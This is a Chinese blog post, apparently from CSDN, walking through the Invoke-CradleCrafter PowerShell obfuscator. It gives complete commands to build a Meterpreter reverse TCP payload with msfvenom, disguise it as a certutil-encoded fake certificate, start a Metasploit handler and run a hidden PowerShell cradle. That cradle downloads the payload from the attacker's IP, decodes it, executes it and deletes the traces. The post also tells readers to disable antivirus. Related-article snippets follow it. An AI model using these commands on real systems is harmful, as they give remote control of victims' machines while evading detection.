Invoke-CradleCrafter

最新推荐文章于 2024-05-03 21:20:18 发布
最新推荐文章于 2024-05-03 21:20:18 发布
阅读量2.3k 收藏
点赞数
分类专栏: 横向渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34101364/article/details/122267263
版权

文章目录

介绍

Invoke-CradleCrafter是一个基于windows PowerShell远程下载的生成器和混淆器

下载安装

下载
https://github.com/danielbohannon/Invoke-CradleCrafter

安装

设置运行其他脚本的权限,然后安装Invoke-CradleCrafter,要把杀毒软件关了,否则会报错

Set-ExecutionPolicy Bypass

Import-Module ./Invoke-CradleCrafter.psd1

在这里插入图片描述

使用

第一步
使用msfvenom生成payload,

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.125.130 lport=8888 -e cmd/powershell_base64 -f psh -o payload.txt

在这里插入图片描述

在这里插入图片描述

然后在payload.txt目录下启动一个web服务,服务器ip为192.168.125.130,即链接为http://192.168.125.130/payload.txt
在这里插入图片描述

第二步

使用如下命令启动Invoke-CradleCrafter:

Invoke-CradleCrafter

在这里插入图片描述
先后执行如下命令,生成混淆payload

set URL http://192.168.125.130/payload.txt

在这里插入图片描述

MEMORY

在这里插入图片描述

CERTUTIL

在这里插入图片描述

ALL
1

在这里插入图片描述
将Result:中的内容保存为cert.txt,如用如下命令进行生成伪证书

certutil -encode cert.txt cert.cer

在这里插入图片描述
将cert.cer也放在web目录下
在这里插入图片描述

第三步

使用msfconsole开启监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.125.130
set lport 8888
exploit -j -z

第四步

利用

powershell.exe -Win hiddeN -Exec ByPasS add-content -path %APPDATA%/cert.cer (New-Object Net.WebClient).DownloadString('http://192.168.125.130/cert.cer'); certutil -decode %APPDATA%/cert.cer %APPDATA%/stage.ps1 & start /b cmd /c powershell.exe -Exec Bypass -NoExit -File %APPDATA%/stage.ps1 & start /b cmd /c del %APPDATA%/cert.cer
5wimming
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bat笔试题java-EDR-Testing-Script:使用执行各种ATT&CK/LOLBAS/Invoke-CradleCrafter/
06-13
蝙蝠笔试题java EDR-测试脚本 该存储库包含简单的脚本,用于针对 Miter ATT&CK/LOLBAS/Invoke-CradleCrafter 框架测试 EDR 解决方案。 这个项目现在还处于起步阶段。 它被编写为单个批处理脚本,因此可以轻松上传和运行(而不是解压缩、编译和安装)。 该脚本可以以普通用户或管理员身份运行,但是如果不给它高权限会导致某些测试失败。 目前,此脚本仅适用于 Windows,并且应该适用于大多数安全端点解决方案。 如何 运行脚本并观察发送到 EDR 控制台的警报。 交叉验证这些警报以检查您的 EDR 解决方案是否正确识别它们。 大多数测试只会执行 calc.exe,但可以很容易地修改它以尝试下载和执行,即 Mimikatz。 不要在生产系统上使用此脚本,而是在具有 EDR 的 VM 中部署它。 为什么 因为很难弄清楚 EDR 的准确程度。 大多数 EDR 解决方案都作为安全的灵丹妙药出售,但实际上很难检查正确识别和包含多少种不同的恶意攻击。 并在映射攻击者用于通过内部网络进行透视、执行代码和进展的常用工具和技术方面做得非常出色,该工具将执行这些攻击以帮
红队武器库-网络安全人员必备
anquanzushiye的博客
02-20 5328
包含内容:侦察武器化投递命令与控制横向移动建立立足点提权数据传输杂项内容很不错,建议转发朋友圈作为存档。侦察主动情报收集EyeWitnessis designed to take sc...
certutil 命令配合PS反弹shellcode
CSDN
06-09 5888
您可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件以及验证证书,密钥对和证书链。以上的简介就是certutil工具的常用应用场景,而通过结合powershell的内存加载功能,则可把certutil的功能发挥到极致,接下来先来下载一个PS的加载框架。7.将生成的 crt.cet 放入服务器的根目录下,保证能够访问,然后运行msfconsole控制台,并侦听事件。2.在应急中certutil也是常用工具之一,来对比文件hash,来判断疑似文件。
开发知识点-Powershell
aming小老弟
12-25 1064
使用 powershell 转换 DLL 并使用 Invoke-Shellcode 加载。PowerShell:一个强大的命令行工具,可用于下载文件落地和管理网络连接。
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
Invoke-ARPScan.ps1
04-04
Invoke-ARPScan.ps1
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
全新桥隧坡安全监测解决方案,24h监测效率提升30%
Hi_Target的博客
04-30 784
4月26日,交通运输部党组书记、部长李小鹏在部务会上强调,要高度重视公路桥梁隧道结构监测工作,抓紧推进公路桥梁隧道结构监测系统建设,进一步健全完善公路桥梁隧道结构监测长效运行机制。基于北斗高精度定位技术,采用高精度传感器,融合物联网、人工智能以及三维数字化仿真等技术,实时获取运营数据,掌握桥隧坡的运行状况,可有效减少维护成本,保障运营安全。具备振弦、电压、电流、差阻、RS485、RS232、开关量、继电器、RJ45接口。在全国各省份设有26家分公司,具备专业、高效的演示、演练、支撑、交付等本地化服务能力。
内网安全【1】——域信息收集/应用网络凭证/CS插件/Android/BloodHound
weixin_42090431的博客
04-28 903
因此,域中的计算机本地管理员账号,极有可能能够登陆域中较多的计算机,本地管理员的密码在服务器上后期修改的概率,远低于在个人办公电脑上的概率,而域用户权限是较低的,是无法在域成员主机上安装软件的,这将会发生下面的一幕:某个域用户需要使用viso软件进行绘图操作,于是联系网络管理员进行安装,网络管理员采用域管理员身份登录了域成员主机,并帮助其安装了viso软件,于是这个有计算机基础的员工,切换身份登录到了本地计算机的管理员,后执行mimikatz,从内存当中抓取了域管理员的密码,便成功的控制了整个域。
合规基线:让安全大检查更顺利
a38417的博客
04-29 1002
德迅基线产品还支持自定义基线功能,企业可根据实际的使用场景,自行定义基线的检查项,如定义检查阈值、自定义检查目录、自定义检查结果展现模板、自定义检查项整改方案等,以满足企业多样化的内部监管要求。但是在有限的安全人员、参差不齐的安全技术水平面前,迫切需要能够辅助安全检查与自评估的自动化、标准化的基线检查工具,并且能够支持多种类型的主机、数据库、应用系统等安全基线信息的采集与检测工作。,进行实时安全核查,快速发现安全配置变化,一旦发生安全配置变更异常,以邮件方式进行安全告警。相对于其他同等产品优势,
安全运维 -- splunk 操作手册
leeezp的博客
04-30 775
日常运维操作笔记 (持续更新)
网络安全实训Day16
Yisitelz的博客
04-26 1086
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
小长假来临,企业借助巡检系统做好安全巡查工作
wsd56735676的博客
04-29 416
小长假期间,企业面临员工离岗、生产活动减少等特殊情况,安全隐患易被忽视。借助巡检系统做好全面安全巡查工作至关重要,包括制定巡检计划和路线、分配和管理巡检任务、识别和处理安全隐患、数据分析和优化、培训和沟通以及应急响应准备,确保企业安全生产。
Baidu Comate:“AI +”让软件研发更高效更安全
Baidu_Secrity的博客
04-30 576
4月27日,百度副总裁陈洋出席由全国工商联主办的第64届德胜门大讲堂,并发表了《深化大模型技术创新与应用落地,护航大模型产业平稳健康发展》主题演讲。陈洋表示,“人工智能+”成为催生新质生产力的重要引擎,对于企业而言,务必要抓住这一重要机遇,一方面,要持续深化大模型技术的创新与应用落地;另一方面,要夯实数字安全,全力护航大模型产业平稳健康发展。
Ftrans文件外发系统 构建安全可控文件外发流程
文件数据安全交换
04-29 565
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。飞驰云联主要服务于集成电路半导体、先进制造、高科技、金融、政府机构等行业的中大型客户,现有客户超过500家,其中500强和上市企业150余家,覆盖终端用户超过40万,每年通过飞驰云联平台进行数据传输和保护的文件量达到4.4亿个。
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线简单总结
最新发布
qq_43583125的博客
05-03 496
我这里只记录原理,具体操作看文章后半段或者这篇文章注意这里是解决后渗透通讯问题,之后怎么提权,控制后面再说。
记录浏览器打开网站拦截提示不安全解决方法
仿站、源码搭建/迁移技术博客
04-27 1254
浏览器可能会因为多种原因显示“不安全”的警告,这通常是由于安全设置不当或配置错误造成的。
Invoke-WebRequest 上传文件
07-11
续改进:基于关键业务指标,进行数据分析和评估,发现问题和改进机会你可以使用 PowerShell 中的 `Invoke-WebRequest` 命令来上传文件。以下是一个示例: ```powershell $uri,并持续优化机器人回访流程和服务,以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值